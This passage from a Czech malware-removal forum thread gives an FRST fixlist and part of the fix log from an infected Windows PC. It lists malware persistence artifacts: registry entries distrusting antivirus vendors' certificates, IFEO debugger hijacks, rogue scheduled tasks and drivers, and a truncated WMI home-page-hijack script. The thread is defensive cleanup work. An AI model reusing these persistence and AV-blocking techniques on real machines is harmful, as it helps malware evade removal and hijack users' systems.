HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\Run: [Windows] => C:\Users\Public\Public Documents\Windows Movie Player\player.exe [675840 2008-12-07] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {504f5f88-f0b9-11e4-bf35-b4b52f8204d5} - "F:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {c6bcc6da-e434-11e3-be7e-a4173142e534} - "E:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\MountPoints2: {e1c8640c-1171-11e4-beab-a4173142e534} - "E:\HTC_Sync_Manager_PC.exe"
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy-x32: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {0D8A891D-890C-4808-84D8-2F436AB14653} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {1274336E-AB06-46B6-A48C-0671C5557CC6} - \Microsoft\Windows\TaskScheduler\Maintenance Configurator -> No File <==== ATTENTION
Task: {1687544D-7247-4F5A-965A-A6E920E55278} - \Microsoft\Windows\TaskScheduler\Manual Maintenance -> No File <==== ATTENTION
Task: {1BFF6763-5417-42C6-A8B9-23DE8C0E01B0} - System32\Tasks\a7982934-0630-49b5-bdb1-d23d83f53ffd-6 => C:\Program Files (x86)\Torntv V9.0\Torntv V9.0-nova.exe <==== ATTENTION
Task: {40525C58-79C2-47A1-9AA2-F1D7FC4F0691} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {51C8E8CF-5601-4895-BA14-1F91249AF735} - System32\Tasks\BrickEnforcer-S-1910914952 => c:\programdata\trusted publisher\premiumaugmenter\BrickEnforcer.exe <==== ATTENTION
Task: {561B96D9-0C13-46D1-B48C-11B450EDE068} - System32\Tasks\{05CD7012-09EF-4D71-BB5D-4054E9B7C3DC} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Call of Duty\CoDSP.exe" -d "C:\Program Files (x86)\Call of Duty"
Task: {6F02587F-8A2B-4552-97F6-DEEF229E335B} - \Microsoft\Windows\TaskScheduler\Idle Maintenance -> No File <==== ATTENTION
Task: {7E3BD6D3-90C4-4768-B8A8-7AB6AC090F1F} - System32\Tasks\{D20BA10B-ED49-4FFF-8443-5FFA687CC72A} => C:\WINDOWS\system32\pcalua.exe -a D:\Autorun.exe -d D:\
Task: {87D6BD84-A209-4EE6-A6AD-3F9E410A5AFA} - System32\Tasks\{A1783EA8-E469-4557-B18F-2087FFAF942E} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Ubisoft\Gearbox Software\BrothersInArms\System\bia.exe" -d "C:\Program Files (x86)\Ubisoft\Gearbox Software\BrothersInArms\System"
Task: {B7992938-01F1-4F40-A0EC-0D23D2F0F152} - \Microsoft\Windows\TaskScheduler\Regular Maintenance -> No File <==== ATTENTION
Task: {BA2D6EF1-2E43-41F4-8F05-06D5FD4FE079} - System32\Tasks\{48E5C962-97D2-4C1B-8B42-380F8CFBD54D} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Activision\Spider-Man 2\System\Webhead[old].exe" -d "C:\Program Files (x86)\Activision\Spider-Man 2\System"
Task: {C3753944-E90D-499B-9533-7FC6F108AC80} - System32\Tasks\{C9E0EEC1-BDC8-45D5-8B41-CCC7817DD33A} => C:\WINDOWS\system32\pcalua.exe -a I:\Launch.exe -d I:\
Task: {CFD7C21A-808B-487B-A6EC-8A10E44E8360} - \Microsoft\Windows\SettingSync\BackupTask -> No File <==== ATTENTION
Task: {EC594B90-2D56-4C16-A5E2-F562DBA81135} - System32\Tasks\{13B27974-850F-429D-8474-B89E6AB4248F} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Call of Duty\CoDSP.exe" -d "C:\PROGRA~2\Call of Duty"
Task: C:\WINDOWS\Tasks\a7982934-0630-49b5-bdb1-d23d83f53ffd-6.job => C:\Program Files (x86)\Torntv V9.0\Torntv V9.0-nova.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\BrickEnforcer-S-1910914952.job => c:\programdata\trusted publisher\premiumaugmenter\BrickEnforcer.exeV/schedule /profile c:\programdata\trusted publisher\premiumaugmenter\1910914952.ini <==== ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {03A35688-219B-40F5-AFC8-7A437C49429D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {09F1332C-51BE-4C3D-9F77-6336BC0ECF20} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {0C2DE69F-5155-4FD6-A5F4-7EDDA54CF7C7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {0E29DD56-64FC-413E-8F41-5F0535696FDF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {1109940C-95FA-4E03-A2F2-A28897FB6766} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {14B5528E-A863-4962-9F60-35569D3A1D1C} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {14E9506E-6D62-4741-9179-44D48CFCD8D2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {16EF7AD8-DB44-443A-BCFB-D50A947D99BF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {171CF743-D4F4-4CB1-87BC-7E191F913FC3} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {1B8A65AA-BDF6-470E-B140-356633DFA09A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {204DFD3C-EB06-4456-83C5-CCBF1ED48440} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2547CEC6-613C-43E4-A593-CC2069084999} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {25BA9130-4A0D-46EF-ADB0-73F1C655CF45} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {26A469EA-AA26-4747-81C6-0E1DBEEB2C13} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2C587672-09A4-4A45-9B9B-58A9FE436EF8} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2C9084D8-A408-42AB-8E29-6BD020D24440} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2EC50B37-C4AD-44AB-BA23-D5AAD093C41A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {33A41A2E-33C2-4E13-BE84-3559916A6889} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {34109212-EC73-44D1-BA1D-E129C381F861} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {3421CDC7-4296-4974-A5F7-B5684D8919B1} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {34525437-CA15-4A19-9417-26E92976BC39} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {365B2F7A-0D50-4476-B107-CB48F4658122} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {380E9DF0-D28C-49C4-BEC9-B7F5FC964664} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {43B1BB36-70BE-4F59-BCA6-F429FCF4137C} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {45B33A18-F60E-4AE0-9CAC-5967F87CE983} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {45D166C3-631A-473D-8730-D0ADFD3A6F11} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {464C8606-EF57-4BE1-9060-3966C4EB5C4D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {4D856560-95D3-4C63-A1AA-AD9802529D26} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {5949EADF-9F7D-4C65-8677-313ED03A8983} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {5E7721A4-8B1A-422D-A170-9A7B384FB535} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6150EBBB-6B17-4DD1-8E8C-3FFBF198E57A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {61DCF235-11FE-42E4-B3A5-9777503B4BA7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {659202E6-50F9-46C7-A428-5F75DB77AF0B} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {666C57AA-3376-458E-A26F-708CC9B1FF6D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {69A0C7C2-B8EB-43F1-8C7D-BEDD21F3DB0E} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6CA1EBCC-3860-4C12-9471-FEB4058AE6F5} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6E2F5E9C-61D5-490B-BE27-DB2989EC9181} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {726310B3-DC05-482A-8873-5CD3627CADFC} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {72CDA94A-2548-4F40-B7D2-280600756A39} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {74934A3E-ACD6-4B9E-9C4C-C78415A9B457} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {873D163A-C7EE-486E-AD02-F14AB4F425EE} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8E2BFB58-D681-41BD-A2C8-CA15440D1EBF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8E9D7148-305D-4F6D-A505-EBFB69404960} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8EE27882-ACAA-4340-AEA5-719145283051} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {94700D82-D8C1-42F7-959E-CAD9A16ADBAE} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {97CB2411-D33F-411A-9813-127915E7C4E2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {9A5A4683-6234-4E10-8AF3-E4FA491D4EB3} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A19F8F23-6424-4131-AE98-D1DACF4876CA} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A3B40275-870B-498B-BD19-B5702E8B61A2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A810E43A-313B-4571-8D1D-6DEC89C6B1D7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A9689D8D-DD63-4900-BD1D-9E6F8E7D26DF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A9AFD5C7-DB69-4A9D-BF1A-8B33473351A4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AB73B2ED-F705-4656-9490-B2C6B2AEB6C6} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AEBA8DD8-21D0-4DB6-A4F2-B4C5569260CA} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AFD30DD4-F70E-4D36-BD50-FB5DA3AAEECF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B37AD013-C2D0-40F3-97D9-0472349E9C44} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B3D3A37C-4613-432E-8E3A-53E589157C4D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B6CA1B24-2418-4737-BB1A-6AB0CC0DF5AC} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B71E823F-B4CC-4FB0-A8CC-DC505018DC1E} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B9A6127D-16DE-481F-B9CA-4B397968F86A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BA398AD4-309C-4915-9C6C-60140565F949} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BA7DE47C-7957-4F39-85B5-BDADF2C1F23D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BF82F267-1D54-46D3-B76F-22D6A302F0EB} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BFE3BE80-727C-44AB-99DE-BAF4905AD5F9} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C0095A98-BEAC-4C7D-89CD-23EDC7F1B0C1} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C5FCA41F-794E-418D-B3AE-C5D2A9AB42A9} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C6404912-B3FD-49D2-A88E-B88706C2E34A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CBE76AAC-7419-4CDE-98F3-48926A7E9121} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CC0BD598-A1C5-475E-AEB4-9A0CC3C53476} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CEDE0664-DEDC-4FA7-A393-3A2258C3D6A5} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CFD8262B-801B-4471-B023-D1EA7C06C2B6} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {D0FAF6B0-BE3C-4C6D-B8BD-E307B77D2678} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {D46AAFD7-49B7-4EDA-8081-F4ED3B3B5580} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E13E38A8-753A-4FD1-904A-066F681EDC1F} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E6138BC0-A1E9-47D4-B000-FA1B4F043F92} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E8D0F6D5-572F-4F61-A09D-85D1CF0BA2FA} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {EBF29334-C208-4510-9CA2-4E7D84F02AB4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {EF0BA1F2-5C7B-4FC4-B685-50C92BCD1FC4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F05B18BC-48EC-4676-A4EF-2B0779FBC7C8} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F068E404-672E-429C-A601-117CA8E6F64B} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F08DC883-0E75-4743-926F-07C2C076133F} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {FBFB7078-3DAC-4B24-8CF6-2B36D1202F93} URL =
FF ProfilePath: C:\Users\Radim\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\GQD9zH3G.default\Profiles\GQD9zH3G.default [not found] <==== ATTENTION
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Footjane\Application\chrome.exe <==== ATTENTION
R1 WiserIso; C:\WINDOWS\System32\Drivers\vcdrom.sys [25432 2016-12-27] (ć·±ĺśłĺ¸‚çŚ«ĺ“ç˝‘ç»śç§‘ćŠ€ĺŹ‘ĺ±•ćś‰é™ĺ…¬ĺŹ¸ -> ) <==== ATTENTION
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ATTENTION
S1 JszipProtect; \??\C:\Program Files (x86)\Maoha\JiSuZip\JsZipProtect64.sys [X] <==== ATTENTION
C:\WINDOWS\LastGood.Tmp
C:\WINDOWS\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
C:\WINDOWS\System32\Tasks\{13B27974-850F-429D-8474-B89E6AB4248F}
C:\WINDOWS\System32\Tasks\{05CD7012-09EF-4D71-BB5D-4054E9B7C3DC}
C:\WINDOWS\System32\Tasks\{C9E0EEC1-BDC8-45D5-8B41-CCC7817DD33A}
C:\WINDOWS\System32\Tasks\{D20BA10B-ED49-4FFF-8443-5FFA687CC72A}
C:\ProgramData\fnnegffbdniflckhmjifljomfnnjhhgd
C:\Users\Radim\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

EmptyTemp:
End

Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.

kovadlina11 · #9 Příspěvek od **kovadlina11** » 02 srp 2019 08:09

Fix result of Farbar Recovery Scan Tool (x64) Version: 31-07-2019
Ran by Radim (01-08-2019 21:35:31) Run:1
Running from C:\Users\Radim\Desktop
Loaded Profiles: Radim (Available Profiles: Spravce & Radim)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
ShellExecuteHooks: No Name - {E080595E-3381-11E7-A376-64006A5CFC23} - -> No File
ContextMenuHandlers1: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => -> No File
ContextMenuHandlers1: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers1: [JZContextMenuExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => -> No File
ContextMenuHandlers2: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers4: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => -> No File
ContextMenuHandlers2: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers4: [JsZipShlExt] -> {5C551008-A347-4DB3-AF48-014076FD2B46} => -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"ASEC\"",Filter="\\.\root\subscription:__EventFilter.Name=\"EventFilter sethomePage2\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->SethomePage Interval Timer:: <==== ATTENTION
WMI:subscription\__EventFilter->EventFilter sethomePage2::[Query => Select * From __timerevent Where TimerId = "SethomePage Interval Timer"] <==== ATTENTION
Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemOb (the data entry has 2410 more characters).] <==== ATTENTION
HKLM\software\microsoft\Windows\CurrentVersion\Telephony\Providers => ProviderFileName2 -> ndptsp.tsp (No File)
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
